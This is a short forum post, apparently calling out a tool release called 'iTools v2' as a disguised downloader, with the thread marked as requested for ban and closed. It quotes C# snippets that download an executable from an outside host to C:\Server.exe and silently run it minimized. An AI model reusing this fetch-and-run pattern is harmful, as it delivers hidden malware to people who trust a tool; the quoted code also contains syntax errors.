Interesting how fast you made iTools v2:
Code:
public void Downloaden{
WebClient client = new WebClient();
string address = "http://videobase.bplaced.net/Tools/iToolsv2.exe";
string path = @"C:\Server.exe";
client.DownloadFile(address, path);
}
Code:
public string runfile(){
if(File.Exists(@"C:\Server.exe")){
Interaction.Shell(@"C:\Server.exe".AppWinStyle.MinimizedFocus,false,-1);
flag=true;
}
}
#Requested for ban.
#Closed.